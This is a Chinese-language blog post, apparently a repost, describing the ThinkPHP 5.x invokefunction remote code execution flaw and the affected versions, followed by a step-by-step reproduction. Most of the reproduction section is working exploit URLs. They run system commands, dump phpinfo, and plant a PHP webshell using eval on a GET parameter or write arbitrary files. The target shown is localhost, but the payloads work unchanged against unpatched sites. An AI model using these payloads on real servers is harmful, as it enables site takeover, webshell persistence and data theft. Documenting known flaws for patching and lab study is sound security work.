您好,登錄后才能下訂單哦!
這篇文章將為大家詳細(xì)講解有關(guān)thinkphp遠(yuǎn)程執(zhí)行命令漏洞,小編覺(jué)得挺實(shí)用的,因此分享給大家做個(gè)參考,希望大家閱讀完這篇文章后可以有所收獲。
漏洞概況
ThinkPHP是一款國(guó)內(nèi)流行的開(kāi)源PHP框架,近日被爆出存在可能的遠(yuǎn)程代碼執(zhí)行漏洞,攻擊者可向緩存文件內(nèi)寫(xiě)入PHP代碼,導(dǎo)致遠(yuǎn)程代碼執(zhí)行。
雖然該漏洞利用需要有幾個(gè)前提條件,但鑒于國(guó)內(nèi)使用ThinkPHP框架的站點(diǎn)數(shù)量之多,該漏洞還是存在一定的影響范圍。由于框架對(duì)控制器名沒(méi)有進(jìn)行足夠的檢測(cè)會(huì)導(dǎo)致在沒(méi)有開(kāi)啟強(qiáng)制路由的情況下可能的getshell漏洞。
漏洞危害
攻擊者可通過(guò)該漏洞獲取網(wǎng)站的控制權(quán)限,可修改頁(yè)面,導(dǎo)致數(shù)據(jù)泄漏等問(wèn)題。
影響版本
5.x < 5.1.31, <= 5.0.23
復(fù)現(xiàn)環(huán)境
thinkphp5.1 phpstudy集成環(huán)境(php5.6n+apache+mysql)
復(fù)現(xiàn)過(guò)程
1、如圖所示首先搭建好環(huán)境
2、利用system函數(shù)遠(yuǎn)程命令執(zhí)行:
http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=whoami
3、通過(guò)phpinfo函數(shù)寫(xiě)出phpinfo()的信息:
http://localhost/thinkphp5.1/html/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1
4、寫(xiě)入shell:
http://localhost/thinkphp5.1/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php
或
http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo 'ok';?>
關(guān)于“thinkphp遠(yuǎn)程執(zhí)行命令漏洞”這篇文章就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,使各位可以學(xué)到更多知識(shí),如果覺(jué)得文章不錯(cuò),請(qǐng)把它分享出去讓更多的人看到。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。